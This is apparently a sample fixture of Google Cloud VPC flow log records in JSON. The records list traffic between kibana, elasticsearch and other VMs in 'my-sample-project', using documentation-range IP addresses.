-{"insertId":"19im82tfdygznk","jsonPayload":{"bytes_sent":"185295","connection":{"dest_ip":"10.87.40.76","dest_port":33562,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznm","jsonPayload":{"bytes_sent":"68961","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.58","src_port":49438},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"711","reporter":"DEST","rtt_msec":"114","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzob","jsonPayload":{"bytes_sent":"62072","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565272745Z","packets_sent":"360","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072372604Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznc","jsonPayload":{"bytes_sent":"198326","connection":{"dest_ip":"10.87.40.76","dest_port":33590,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"246","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.146956782Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznj","jsonPayload":{"bytes_sent":"61436","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33550},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"362","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo5","jsonPayload":{"bytes_sent":"66791","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33690},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"355","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.075665334Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzod","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"198.51.100.107","src_port":54812},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzna","jsonPayload":{"bytes_sent":"64466","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33562},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:49.549471457Z","packets_sent":"363","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzng","jsonPayload":{"bytes_sent":"174524","connection":{"dest_ip":"10.87.40.76","dest_port":33968,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"66","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo1","jsonPayload":{"bytes_sent":"181624065","connection":{"dest_ip":"10.49.136.133","dest_port":52780,"protocol":6,"src_ip":"203.0.113.228","src_port":9243},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"simianhacker-demo","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:58.592579489Z","packets_sent":"28344","reporter":"DEST","rtt_msec":"91","src_location":{"asn":16509,"city":"Boardman","continent":"America","country":"usa","region":"Oregon"},"start_time":"2019-06-14T03:40:17.183499423Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo8","jsonPayload":{"bytes_sent":"1460","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"192.0.2.117","src_port":51348},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzoa","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"192.0.2.12","dest_port":44128,"protocol":6,"src_ip":"10.73.186.17","src_port":22},"dest_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"end_time":"2019-06-14T03:45:22.081121292Z","packets_sent":"1","reporter":"SRC","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzn7","jsonPayload":{"bytes_sent":"11137","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33968},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.965294083Z","packets_sent":"95","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.480272197Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznf","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"198.51.100.107","dest_port":54812,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:45:20.708994883Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:45:20.595119257Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzni","jsonPayload":{"bytes_sent":"21792","connection":{"dest_ip":"203.0.113.134","dest_port":33564,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"186","reporter":"SRC","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzns","jsonPayload":{"bytes_sent":"74370","connection":{"dest_ip":"203.0.113.58","dest_port":49438,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220725956Z","packets_sent":"580","reporter":"SRC","rtt_msec":"114","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.398463104Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznp","jsonPayload":{"bytes_sent":"138337","connection":{"dest_ip":"10.87.40.76","dest_port":33550,"protocol":6,"src_ip":"198.51.100.248","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565287007Z","packets_sent":"244","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500498059Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo9","jsonPayload":{"bytes_sent":"30062","connection":{"dest_ip":"192.0.2.177","dest_port":60110,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"124","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo3","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.0.2.117","dest_port":51348,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:20.754300982Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:20.630975303Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznz","jsonPayload":{"bytes_sent":"152218","connection":{"dest_ip":"203.0.113.134","dest_port":33560,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"243","reporter":"SRC","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo4","jsonPayload":{"bytes_sent":"143085","connection":{"dest_ip":"203.0.113.134","dest_port":33510,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"249","reporter":"SRC","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznt","jsonPayload":{"bytes_sent":"61245","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33510},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565078274Z","packets_sent":"356","reporter":"DEST","rtt_msec":"352","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.074688714Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygznu","jsonPayload":{"bytes_sent":"65919","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"203.0.113.134","src_port":33532},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"361","reporter":"DEST","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzo6","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"198.51.100.182","dest_port":41822,"protocol":6,"src_ip":"10.139.99.242","src_port":22},"dest_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"end_time":"2019-06-14T03:40:40.058368408Z","packets_sent":"4","reporter":"SRC","rtt_msec":"1439","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzno","jsonPayload":{"bytes_sent":"188997","connection":{"dest_ip":"203.0.113.134","dest_port":33532,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"251","reporter":"SRC","rtt_msec":"270","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.072555233Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygzo0","jsonPayload":{"bytes_sent":"16783","connection":{"dest_ip":"203.0.113.134","dest_port":33568,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789035952Z","packets_sent":"79","reporter":"SRC","rtt_msec":"506","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.456732113Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"}
-{"insertId":"19im82tfdygznd","jsonPayload":{"bytes_sent":"18120","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33858},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"120","reporter":"SRC","rtt_msec":"4","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.458361534Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
-{"insertId":"19im82tfdygzn8","jsonPayload":{"bytes_sent":"64071","connection":{"dest_ip":"198.51.100.248","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33558},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"368","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.140109489Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} 
